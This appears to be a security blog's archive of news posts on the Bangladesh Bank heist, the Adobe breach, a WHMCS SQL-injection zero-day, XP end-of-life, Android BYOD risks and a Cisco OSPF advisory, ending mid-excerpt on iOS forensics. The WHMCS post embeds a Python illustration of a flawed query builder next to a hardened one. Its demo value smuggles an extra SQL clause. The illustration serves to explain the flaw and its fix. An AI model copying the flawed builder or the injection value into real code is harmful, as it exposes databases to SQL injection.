TechJournal, by Kiran Vangaveti<br />
<h2>Bangladesh Bank Heist</h2>
2016-05-03<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="https://3.bp.blogspot.com/-1J2-LUlsE1s/Vyi7uOrU9EI/AAAAAAAAD4Y/cuwiA9rx5SQWbiX58lz961T0PrT09QaAwCLcB/s1600/bbank.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="360" src="https://3.bp.blogspot.com/-1J2-LUlsE1s/Vyi7uOrU9EI/AAAAAAAAD4Y/cuwiA9rx5SQWbiX58lz961T0PrT09QaAwCLcB/s640/bbank.jpg" width="640" /></a><br />
<br />
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
The Bangladesh Bank hack is one of the biggest bank heists in global financial history. There have been larger scams and scandals, but among cyber heists from a single bank, this one takes the cake.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
The heist of over $80 million sent shock waves through the global financial system, and security experts scrambled to find out how it had happened. Political and administrative authorities played the blame game, as was expected of them. Resignations were offered and statements were issued. It was complete chaos.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
Now the storm is over and the dust seems to be settling. As the bigger picture comes into focus, it is becoming clearer what exactly went wrong.</div>
<h2 style="border: 0px; box-sizing: border-box; color: #737679; font-family: helvetica, arial, sans-serif; font-size: 32px; font-stretch: inherit; font-weight: 400; line-height: 1.25; margin: 0px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
How it happened</h2>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
It all began on one fateful Friday with a printer failure. On 5 February 2016, Jubair Bin Huda, the bank’s joint director for accounts, discovered a printer failure that left him unable to collect the previous day’s transaction records, the Financial Times <a href="http://www.ft.com/cms/s/0/39ec1e84-ec45-11e5-bb79-2303682345c8.html" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">reports</a>. The printer failure was only the tip of the iceberg, though. Three days later, the bank discovered that the printer was not the only thing that had failed. The magnitude of the theft suggested that the bank’s cyber security controls had not fared much better.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
The hackers managed to break into the bank’s systems and transfer more than $80 million from its New York Federal Reserve account to multiple bank accounts located in Sri Lanka and the Philippines. A significant number of the transfer requests, 30 out of 35, were blocked by the Federal Reserve, saving the bank a loss of $850 million. But the five requests that managed to pass through, amounting to more than $80 million, were devastating enough in their consequences.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
Security analysts <a href="http://www.reuters.com/article/us-usa-fed-bangladesh-malware-idUSKCN0WD1EV" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">suggest</a> that they did it by installing malware on one of the bank’s computers, which enabled them to spy on the bank’s monetary activities for weeks and observe how money transfers took place.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
However, investigators <a href="http://news.softpedia.com/news/second-hand-switches-no-firewall-custom-malware-facilitated-bank-cyber-heist-503388.shtml" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">believe</a> that the heist involved hackers utilizing a Remote Access Trojan (RAT). Through this, they were able to gain remote control of the bank’s computers and initiate funds transfers. It may have taken the hackers almost a year of planning and preparation, which involved opening multiple accounts in various banks in the Philippines and Sri Lanka using fake documentation. It is ironic, though, that despite all the meticulous planning, <a href="http://www.reuters.com/article/us-usa-fed-bangladesh-typo-insight-idUSKCN0WC0TC" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">a typo</a> in a transfer request turned out to be the Achilles’ heel and helped uncover the entire operation.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
<a href="http://www.bbc.com/news/technology-36110421" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">According to BBC</a>, the bank didn't have a firewall and used cheap $10 internet routers. This just made the malicious actors job very easy. Good prevention and detection controls would at least have helped detect the whole operations much sooner.</div>
<h2 style="border: 0px; box-sizing: border-box; color: #737679; font-family: helvetica, arial, sans-serif; font-size: 32px; font-stretch: inherit; font-weight: 400; line-height: 1.25; margin: 0px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
SWIFT software security</h2>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
Perhaps the most troubling aspect of the whole episode was that the hackers managed to get into the SWIFT software. SWIFT lies at the heart of the global financial system: it is the network that connects the majority of the world’s financial institutions and enables them to send and receive messages about financial transactions.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
However, it was the bank's systems and controls that were compromised, not the software, <a href="http://www.bankinfosecurity.com/bangladesh-bank-heist-lessons-learned-a-9064/op-1" rel="nofollow" style="border: 0px; box-sizing: border-box; color: #8c68cb; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">according to</a> independent security consultant William Murray: "The SWIFT software behaved as it was intended to, but was not operated by the intended person or process. This is a bank problem, not a SWIFT problem."</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
The major take-away from this is that financial institutions must pay extra attention to ensure the protection of the computers with the SWIFT software installed.</div>
<h2 style="border: 0px; box-sizing: border-box; color: #737679; font-family: helvetica, arial, sans-serif; font-size: 32px; font-stretch: inherit; font-weight: 400; line-height: 1.25; margin: 0px 0px 15px; outline: 0px; padding: 0px; vertical-align: baseline;">
Takeaways</h2>
<h3 style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; color: rgba(0, 0, 0, 0.85098); font-family: Helvetica, Arial, sans-serif; font-size: 20px; font-stretch: inherit; font-weight: 400; line-height: 1.2; margin: 0px 0px 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
Cyber Security is not an IT problem</h3>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
It is a business problem. Businesses should view cyber risk on par with operational, regulatory and financial risk. Unfortunately, most organization boards fail to recognize this.</div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
Lutfus Sayeed, an Information Systems professor at California State University, believes that cyber security must be incorporated into any organization’s central business strategy. IT Security must have a seat at the boardroom, at the executive table. It must not be viewed as a specialized function that is detached from the core business processes.</div>
<h3 style="border: 0px; box-sizing: border-box; color: rgba(0, 0, 0, 0.85098); font-family: helvetica, arial, sans-serif; font-size: 20px; font-stretch: inherit; font-weight: 400; line-height: 1.2; margin: 0px 0px 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
Cyber Security is not a checklist</h3>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: "georgia" , "times new roman" , serif;">Security should not be a compliance checklist, regulatory or otherwise. You will never be secure by being compliant. You will always be compliant by practicing good security processes. A learned friend, who was involved with ensuring a major card compliance program is implemented at banks worldwide, reveals, many banks in the east, would just write-off compliance fines and pay them, rather than comply. They consider it more cost-effective.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
The Bangladesh Bank heist has hopefully driven home the point that cybersecurity cannot be an afterthought. The business impact of poor cybersecurity practices is harsh and real.</div>
<h3 style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; color: rgba(0, 0, 0, 0.85098); font-family: Helvetica, Arial, sans-serif; font-size: 20px; font-stretch: inherit; font-weight: 400; line-height: 1.2; margin: 0px 0px 8px; outline: 0px; padding: 0px; vertical-align: baseline;">
Cyber Security needs attention</h3>
<div>
<br /></div>
<div>
<span style="color: #232629; font-family: "georgia" , serif; font-size: 18px; line-height: 32px;">Cyber Security is a critical business function that needs attention. Organizations that do not have resources to manage cybersecurity should look at Managed Security Service Providers for assistance. </span><br />
<span style="color: #232629; font-family: "georgia" , serif; font-size: 18px; line-height: 32px;"><br /></span></div>
<div style="border: 0px; box-sizing: border-box; color: #232629; font-family: georgia, serif; font-size: 18px; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
The business impact of poor cybersecurity practices is harsh and real. Don't let your business fall victim to cyber threats.</div>
</div>
Posted by Kiran Vangaveti<br />
<h2>sales pitch</h2>
2014-01-23<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/30253118?rel=0" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px; max-width: 100%;" width="427"> </iframe> <br />
<div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/slidesthatrock/your-sales-pitch-sucks" target="_blank" title="Your Sales Pitch Sucks!">Your Sales Pitch Sucks!</a> </strong> from <strong><a href="http://www.slideshare.net/slidesthatrock" target="_blank">Slides That Rock</a></strong> </div>
<br /></div>
Posted by Kiran Vangaveti<br />
<h2>Sudo Make me a sandwich</h2>
2013-10-07<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
Android 4.0+ Security in the Face of Custom ROMs<br />
<br />
<br /></div>
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/JBGJe0uVSLY" width="420"></iframe>
<br />
<br />
<span style="background-color: white; font-family: Arial; font-size: 12px; line-height: 19px; text-align: justify;">Max will give an overview of Android’s device protection mechanisms in 4.0+ and how they can be circumvented or unintentionally undermined by device manufacturers, 'cause each device manufacturer or carrier can add or modify code from the Android Open Source Project (AOSP). This can include access to device memory, exploitable processes which run as the root user, initialization scripts which perform privileged actions without proper validation, or APKs which leak access to otherwise-protected information sources. The talk will also detail /boot and /recovery differences between OEMs, how signature checks are performed, and demonstrate some of our tools to examine new devices and find potential security flaws.</span><br />
<div>
<span style="background-color: white; font-family: Arial; font-size: 12px; line-height: 19px; text-align: justify;"><br /></span></div>
</div>
Posted by Kiran Vangaveti<br />
<h2>Adobe breached, compromised source code</h2>
2013-10-07<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
In a blog post on Thursday, Adobe said that during a security audit sometime around September 17, the company discovered that attackers had accessed Adobe customer IDs, as well as encrypted passwords. In addition to IDs and passwords, Adobe Chief Security Officer, Brad Arkin, said that the attackers also accessed customer names, encrypted credit and debit card numbers, expiration dates and "other information."<br />
<br />
"At this time, we do not believe the attackers removed decrypted credit or debit card numbers from our systems". Question, why is that information not encrypted in the first place. What is the need to store them unencrypted.<br />
<br />
In all, Adobe says that the breach impacts some 2.9 million customers worldwide, and that they're in the process of sending out notifications to those who had credit or debit card details compromised. Further, Adobe has alerted the banks processing customer payments, in order for them to help protect accounts upstream.<br />
<br />
Adobe admitted that source code was stolen during the incident. It wouldn't comment on which product lines were affected. Adobe products are installed on almost every system out there. In theory this could mean that their software has more 0-days than we are aware of. It could also mean that current versions may already have been altered and backdoored.<br />
<br />
The earliest known date of discovery is September 17, but Adobe hasn't said how long the attackers have had possession of the stolen source code, nor can it comment on how far it has spread online. Last week, reporter Brian Krebs found 40 GB worth of Adobe's proprietary data on a server used by criminals, but by the time he found it, Adobe was already investigating its theft.<br />
<br />
In an advisory to customers, Adobe confirmed that the source code theft affected Adobe Acrobat, ColdFusion, ColdFusion Builder and "other Adobe products." As to what those other products are, Adobe didn't say. And why would they?<br />
<br />
Adobe recommends that customers update to the latest supported software versions, and that they download the newest releases when they're made available on October 8.<br />
<br /></div>
Posted by Kiran Vangaveti<br />
<h2>WHMCS - 0day</h2>
2013-10-07<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Hong Kong-based PureVPN faced problems this weekend after someone used a zero-day vulnerability in WHMCS to send the networking firm's customers an alarming message. The rogue email stated that the VPN service was going to shut down due to legal issues, and that customer information had been handed over to the authorities.<br />
<br />
Addressed simply as "Dear Customer," the letter said that due to an incident, PureVPN would be closing accounts and was no longer able to run an anonymization service. In addition, it said the company "had to handover all [customer] information to the authorities."<br />
<br />
The letter was signed by Uzair Gadit, the co-founder of PureVPN, who took to his company's blog and Twitter on Saturday to dispute the claims it made. According to a second email delivered to customers, the cause of the letter was a <span style="background-color: yellow;"><a href="http://blog.whmcs.com/?t=79427" rel="nofollow" target="_blank">vulnerability in WHMCS</a></span> — a platform used by many service providers like PureVPN to manage user registrations and accounts, as well as billing and support.<br />
<br />
"Preliminary reports suggest that we are hit with a zero day exploit, found in [WHMCS]...We are able to confirm that the breach is limited to a subset of registered users Email IDs and names," a blog post by PureVPN explained.<br />
<br />
The WHMCS vulnerability was disclosed last week in versions 5.2.7 and 5.1.9. Moreover, proof-of-concept code for launching an SQL Injection attack spread to a few different exploitation-based forums and places like Pastebin. The flaw itself resides in dbfunctions.php (update_query), and requires that the attacker have an account on the system; something that is easily done considering the nature of WHMCS.<br />
<br />
At issue is the fact that the script trusts any SQL update that has a value starting with AES_ENCRYPT. As it was explained to CSO, this was a case of missing input validation checks, a common (yet risky) coding error.<br />
<br />
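The flaw described above, as an added illustration written in Python for this post (it is not WHMCS's own code; the builder functions, the <code>clients</code> table, the column names and the <code>ENCRYPTED_COLUMNS</code> set are assumptions): a query builder that trusts any value beginning with <code>AES_ENCRYPT</code> as raw SQL, beside a hardened builder in which the decision to encrypt comes from server-side configuration and every value travels as a bind parameter.

```python
import re
from typing import Dict, List, Tuple

# Columns the application itself has decided to store encrypted
# (constructed set for this example; not a WHMCS schema).
ENCRYPTED_COLUMNS = {"cardnum"}

# Strict identifier pattern: table and column names must be plain words.
_IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def build_update_flawed(table: str, fields: Dict[str, str], where: str) -> str:
    """Flawed pattern: every value is escaped and quoted EXCEPT one that starts
    with AES_ENCRYPT, which is spliced into the statement as raw SQL. The value
    comes straight from the request, so the prefix check is the whole defence."""
    parts: List[str] = []
    for col, val in fields.items():
        if val.startswith("AES_ENCRYPT"):
            parts.append(f"`{col}`={val}")  # raw, unescaped user input
        else:
            escaped = val.replace("\\", "\\\\").replace("'", "\\'")
            parts.append(f"`{col}`='{escaped}'")
    return f"UPDATE `{table}` SET {', '.join(parts)} WHERE {where}"


def build_update_safe(table: str, fields: Dict[str, str], where_col: str,
                      where_val: str, key: str) -> Tuple[str, List[str]]:
    """Hardened form: identifiers are validated, every value is a bind
    parameter, and AES_ENCRYPT is applied only to columns the server-side
    configuration marks as encrypted, never because of what the value says.
    Returns the statement with %s placeholders and the parameter list."""
    for ident in (table, where_col, *fields):
        if not _IDENT.match(ident):
            raise ValueError(f"invalid identifier: {ident!r}")
    parts: List[str] = []
    params: List[str] = []
    for col, val in fields.items():
        if col in ENCRYPTED_COLUMNS:
            parts.append(f"`{col}`=AES_ENCRYPT(%s, %s)")
            params.extend([val, key])
        else:
            parts.append(f"`{col}`=%s")
            params.append(val)
    params.append(where_val)
    sql = f"UPDATE `{table}` SET {', '.join(parts)} WHERE `{where_col}`=%s"
    return sql, params


def demo() -> Tuple[str, str, List[str]]:
    """Runs both builders on a constructed profile update whose field value
    begins with AES_ENCRYPT and carries an extra SET clause after it."""
    hostile = "AES_ENCRYPT('x','k'), `note`='injected'"
    flawed = build_update_flawed("clients", {"firstname": hostile}, "`id`=42")
    safe_sql, params = build_update_safe(
        "clients", {"firstname": hostile}, "id", "42", "server-side-key")
    return flawed, safe_sql, params


if __name__ == "__main__":
    flawed, safe_sql, params = demo()
    print("flawed :", flawed)      # the injected clause is now part of the SQL
    print("safe   :", safe_sql)    # only placeholders; value stays in params
    print("params :", params)
```

The flawed builder emits the second SET clause as executable SQL, while the hardened builder returns a statement with only placeholders and keeps the whole string as an inert parameter.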
It's unclear whether any other websites were targeted by those responsible for the PureVPN compromise. Given the nature of the vulnerability itself, CSO asked PureVPN whether it could rule out that the entire email database was accessed, but the company didn't respond to questions.</div>
Posted by Kiran Vangaveti<br />
<h2>XP not dead yet</h2>
2013-10-07<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<h1 style="font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; font-size: 20px; margin: 0px 0px 10px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; font-weight: normal; line-height: 18px;"><a href="http://www.csoonline.com/article/741080/despite-looming-end-of-life-study-shows-xp-remains-primary-os?source=rss_cso_exclude_net_net" rel="nofollow" target="_blank">A recent series of customer studies by mobile management firm Fiberlink shows a pattern of risky behavior, and widespread usage of a soon to be dead operating system</a></span></h1>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Examining data from one million devices, <a href="http://www.maas360.com/" style="color: #006699; text-decoration: none;">Fiberlink</a>, a mobile management firm, looked at the often forgotten part of mobility in the workforce — laptops. While IT and security vendors focus on Google's Android, Apple's iOS, tablets, and smartphones, Lenovo's ThinkPad and Dell's Latitude chug along, remaining a stable fixture in the workplace. According to Fiberlink, almost 50 percent of the laptops observed in their study are running Windows XP.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Not counting extended support contracts, in April 2014, IT and security managers will be forced to face the fact that Windows XP has reached end of life. As is the case with other operating systems, XP will remain as a legacy installation and cause its own share of risk in some cases. However, the explosion of mobile in the work force, which includes laptops procured years ago that now live their life in a constant state of rotation between staff, means that organizations will have some choices to make.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
"Looking at the laptops we manage, we see close to 50 percent of customer devices that need to upgrade or be replaced by that time. When speaking with our customers, they are typically not enthused with migrating to Windows 8, which leaves them in a situation where many are going to upgrade to Windows 7 instead or are waiting to see what Windows 8.1 is going to bring to the table," Fiberlink explained in an email to CSO.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Organizations have had some time to prepare for the change from XP, but that doesn't mean that such deployments are finished. However, CSO was curious about the mindset of many IT managers when it came to OS changes and security, particularly management. When considering the two, IT has been looking at platforms that enable them to manage employee-owned and corporate-assigned devices from one instance, and lucky for them — there are <a href="http://www.air-watch.com/" style="color: #006699; text-decoration: none;">plenty</a> of <a href="http://www1.good.com/" style="color: #006699; text-decoration: none;">vendors</a> that <a href="http://www.landesk.com/" style="color: #006699; text-decoration: none;">claim to do this</a> in the <a href="http://www.mobileactivedefense.com/" style="color: #006699; text-decoration: none;">MDM</a> market. (<a href="http://www.symantec.com/" style="color: #006699; text-decoration: none;">No, seriously</a>, <a href="http://www.mcafee.com/" style="color: #006699; text-decoration: none;">there's plenty of options</a>.)</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
"We were surprised to see that almost half of our laptop customers are still running XP. That number continues to shrink every day, but it's still unclear what many CIO's and IT executives will choose as their next move," Chuck Brown, director of product management at Fiberlink, told CSO.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
"We're seeing businesses consider many different options as Windows XP gets closer to the end of its support in April 2014. Potentials options include upgrading employees to Windows 7, waiting to see what Windows 8.1 feels like, and even moving straight to the Windows Surface Pro 2."</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Employee-owned laptops (much like employee-owned tablets and phones) are a growing trend and a source of risk. IT doesn't want full control over these devices, but if they're being used to access sensitive data or communications, there needs to be some sort of visibility and management, such as pushing patches or enforcing VPN usage.</div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px;">Speaking to CSO, Brown, said that the enterprise is certainly not abandoning the laptop. In fact, it's quite the opposite as CIO's and IT executives are just as concerned about managing laptops as they are about phones and tablets. All of these devices have the same concerns related to compliance, protecting corporate data and applications. But laptops are just one part of the BYOD profile.</span><br />
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Prior to examining laptop usage, Fiberlink looked at other security metrics, including the use of passcodes on mobile devices. According to a random sampling of 1,000 customers, a majority of the passcodes allowed by IT are simple PINs (93 percent). Of those devices with PINs, 73 percent require a length of 4-5 characters, while 27 percent require greater than five characters.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Further, in July, Fiberlink looked at data risk, and discovered that of those employees who use either a personally owned mobile device, or one issued by their employer, 25 percent of them saved work-related documents into a third-party application (e.g., Dropbox, Quick Office, or Evernote); 20 percent said they've copied work-related documents into personal email; and 18 percent noted that they've used mobile devices to bypass IT's Web filtering policies.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Again, laptops with a soon-to-expire OS are just one part of the problem, as this data clearly shows. Long after employees are migrated away from XP, the little things such as weak PINs and risky data handling will still pose the most risk to the business. This is why mobile device usage is such a hot topic, and, just like laptops were in the mid-90s, something that will require planning and time before IT can get a solid handle on it.</div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 16px; margin-bottom: 15px;">
Today's workforce is a mash-up of personal and professional gadgets, platforms, services, and applications. IT can no longer sacrifice personal usage over professional, so they're looking for ways to make them work together securely, but making that solution look as good in reality as it does on paper, is easier said than done.</div>
</div>
Posted by Kiran Vangaveti<br />
<h2>Enterprises warned against first true Google phone, Moto X - CSO Online - Security and Risk</h2>
2013-08-02<br />
<p>The security nightmare corporations face with the bring-your-own-device (BYOD) trend just got worse with the release of Google's new Moto X. With the Android smartphone unveiled Thursday, Google is hoping to lure customers with a personal digital assistant that's easy to use and can guess what information or services people want by reading emails and schedules and tracking search queries. While all this data collection may make the device invaluable, it also should make corporations very nervous.</p>
<p>"It's engineers gone wild," said Roger Entner, principal analyst for Recon Analytics. "The engineers are [saying], 'Oh, wouldn't this be a really cool idea,' but don't think through the repercussions."</p>
<p>The ease-of-use features in the Moto X, designed and built by Google-owned Motorola, are likely to tickle consumers while haunting IT security pros. First is the always-on microphone, which a person can use to activate the device using trigger words, such as "OK Google Now," to make phone calls or access services and features. The feature is possible through a special, low-power chip developed by Motorola that keeps the microphone on without draining the battery.</p>
<p>The always-ready microphone, coupled with the massive amount of data collection, makes the Moto X a valuable target for cybercriminals and cyberspies, who are already heavily focused on developing malware to take control of Android devices. Security researchers say tools for building and distributing Android malware are getting progressively better in the criminal underground.</p>
<p>In 2012, the number of Android malware samples rose more than 2,500% and accounted for 95% of mobile threats on the Internet, according to Cisco's 2013 Annual Security Report. Malware exists today that can take control of an Android device if a user can be tricked into installing an infected app from an online store or clicking a malicious link in a text message. "Once that happens, all bets are off, and all these lovely sensors become a continuous sound and video information-gathering tool on your designated target," said Kurt Stammberger, vice president of market development for mobile security vendor Mocana.</p>
<p>Motorola will also provide hands-free authentication with the Moto X, through a plastic token that can be clipped onto clothing and communicates via near-field communication (NFC). As long as the token is within a few feet, a password won't be necessary to unlock the device. The token will be sold separately, reports said. "I'm sure someone at Black Hat or Defcon will figure out a workaround," William Stofega, analyst for IDC, said, referring to the two security conferences now under way in Las Vegas.</p>
<p>The Moto X is not the first Android phone to have these security-troubling features. The Motorola Droid that debuted last week also has them, industry observers say. However, Google has already proclaimed the Moto X its flagship smartphone, and Motorola Mobility is reported to be set to spend as much as $500 million on marketing. Such a push gives the phone a better chance of becoming a success. Google's strategy of making its smartphones as useful as possible is what's needed to drive sales in the consumer market. A phone that can automatically notify the user about traffic conditions before heading to a meeting is certain to please many people.
But the data collection necessary to provide such services, as well as the microphone, camera and NFC needed for ease of use, are making it increasingly difficult for companies to have a liberal BYOD policy. "Bring-your-own-device is a security nightmare in general," Entner said. Whether an employee can use their own device to access the corporate network should depend on their job, Stofega said. A chief research officer may not want his location known or to communicate with staff and bosses without strict security controls. "At some point [companies] have to have control at some level of the person and also the intellectual capital that's invested in that person," Stofega said. In the meantime, companies are better off steering away from the Moto X for now, experts say. "I would not recommend the Moto X to corporate clients until we have a really good understanding and assurances from Google and Motorola on how to combat potential mischief being done with these capabilities," Entner said.</p>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-1493556218661514352013-08-02T07:57:00.001-07:002013-08-02T07:57:30.782-07:00OSPF LSA table vulnerability...most Cisco routers vulnerable<p><a href="http://tools.cisco.com/security/center/viewAlert.x?alertId=30210">Alert Details - Security Center - Cisco Systems</a></p><blockquote>Multiple Cisco products are affected by a vulnerability involving the Open Shortest Path First (OSPF) Routing Protocol Link State Advertisement (LSA) database. This vulnerability could allow an unauthenticated attacker to take full control of the OSPF Autonomous System (AS) domain routing table, blackhole traffic, and intercept traffic. The attacker could trigger this vulnerability by injecting crafted OSPF packets. 
Successful exploitation could cause flushing of the routing table on a targeted router, as well as propagation of the crafted OSPF LSA type 1 update throughout the OSPF AS domain. To exploit this vulnerability, an attacker must accurately determine certain parameters within the LSA database on the target router. This vulnerability can only be triggered by sending crafted unicast or multicast LSA type 1 packets. No other LSA type packets can trigger this vulnerability. OSPFv3 is not affected by this vulnerability. Fabric Shortest Path First (FSPF) protocol is not affected by this vulnerability. Cisco has confirmed the vulnerability in a security advisory and has released software updates.</blockquote>Kiran Vangavetihttp://www.blogger.com/profile/16789033014764600040noreply@blogger.comtag:blogger.com,1999:blog-9013159124343782843.post-89072533804612811282013-08-02T07:15:00.001-07:002013-08-02T07:22:12.997-07:00Investigating iOS Phone Images, File Dumps & Backups | Magnet Forensics<blockquote>As of January 2013, Apple announced it had sold over 500 million iOS devices. While iOS seems to be the leading operating system for tablets worldwide, Android continues to be the leading operating system for mobile phones worldwide. Regardless of the statistics, if you are an active forensic examiner, chances are very high you will need to conduct an examination of an iOS mobile device (if you haven’t several times already). This article will discuss some of the steps involved and areas of interest when conducting an analysis of an iOS device for Internet-related activity.<br />
<br />
<b>Handset Passcodes</b><br />
Depending on the version of iOS, different passcode lengths and complexities are supported:<br />
<ul><li>A simple four digit passcode</li>
<li>A complex numeric passcode</li>
<li>A complex alphanumeric passcode or passphrase</li>
</ul>In many cases, you will need the passcode in order to obtain a physical image or a file system dump. Depending on the iOS version, device hardware version and passcode complexity, the passcode can sometimes be obtained by the forensic tool (such as Cellebrite) using a brute-force attack.<br />
<br />
<b>Physical memory dump vs. file dump vs. AFC file backup</b><br />
Depending on the type of investigation, the tools you have available and the version of the iOS phone you need to examine, you may have a choice whether to conduct a physical memory extraction, a file system dump or an Apple File Connection (AFC) backup. When possible, it would be recommended to obtain a full physical memory extraction since that will likely contain data that the file system dump & AFC backup does not (deleted file system data, etc.).<br />
<br />
<b>Physical memory image</b><br />
